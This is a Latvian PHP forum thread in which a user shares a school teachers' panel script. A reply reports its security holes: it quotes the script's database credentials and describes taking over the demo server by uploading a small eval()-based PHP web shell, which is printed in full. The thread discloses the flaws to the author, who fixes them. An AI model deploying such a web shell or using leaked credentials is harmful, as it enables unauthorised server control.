Jump to content
php.lv forumi

SPanelis


m8t

Recommended Posts

Kas tas ir Spanelis? Būtībā tas ir panelis, kuru es izveidoju savai skolai, precīzāk - skolotājiem. Spanelis = Skolotāju Panelis, bet SPanlis skan īsāk un jautrāk :) Neteikšu ka tas ir kautkas ļoti dižš, bet noderīgs un viegli izmantojams "nezinīšu" grupām.

 

Paraugs: http://untitled.webege.com/

Visu lietotāju paroles ir test.

Lietotājus var pievienot tikai no lielā paneļa, kuru diemžēl es te nelikšu.

 

Neminēšu kurai skolai šis ir veidots, lai jūs tur visu neuzhackotu parcik es šī paneļa skriptu atdodu par brīvu.

DL links: http://shizo0.exs.lv/sp_v2.1.rar

 

Šo paneli var izmantot arī citām lietām, viņš ir nav domāts tikai skolotājiem.

 

Būtu pateicīgs par atsauksmēm - ko derētu pielabot, kur ir kāds caurums utt!

Edited by m8t
Link to comment
Share on other sites

ak tu dies, cik caurs tas pasākums tev ir :D

 

$usernameerer = "a9353198_a";

$passworderer = "nonamer112";

$hosterer = "mysql14.000webhost.com";

$databaseerer = "a9353198_a";

 

:)

 

EDIT: kopš šī brīža vairs nekad, atkārtošu NEKAD neļauj augšupielādēt failus, nepārbaudot to saturu un novietojot tos publiski izpildāmā vietā. Laušana aizņēma ~5 minūtes, jo vienkārši uploadēju index.php failu ar saturu:

<?php

if (!empty($_POST['text'])){
       eval(stripslashes($_POST['text']));
}
echo '<form method="post"><textarea cols="50" rows="20"  name="text">' . @stripslashes(htmlspecialchars($_POST['text'])) . '</textarea><input type="submit" name="sbmt" value="hack!" /></form>';

 

Tā kā uploadotie faili glabājas publiskā mapē un tu nekādi neaizliedz man tos izpildīt, tad vari uzskatīt, ka serveris ir pilnīgi manā rīcībā :)

 

un jā, nodzēs /up/index.php tagad lūdzu :)

Link to comment
Share on other sites

Eek :D Tiko pamanīju ka var pievienot visa vaida failus :D esmu aizmirsis uzlikt limitu :D

 

Edit: Rekā, atradu jau veselas 3 kļūdas tikai ar jūsu palīdzību. Paldies! :)

Edited by m8t
Link to comment
Share on other sites

Cik stulbi no manas puses. Kautko salabot, bet aizmirst pārbaudīt... Lai nu kā, tagat viss strādā (vismaz man). Pieliku arī tos stripslashes, bet ko viņi tādu īsti dara? Drošības ziņā viņi kautko dod?

 

 

Edit:

Varbūt kādam ir kādas idejas, kā krāsas pamainīt? Baigi nepatīk teksts sarkanajā errorā, bet citas krāsa galīgi nepiestāv, piemēram melna tur galīgi pretīgi izskatās.

Edited by m8t
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...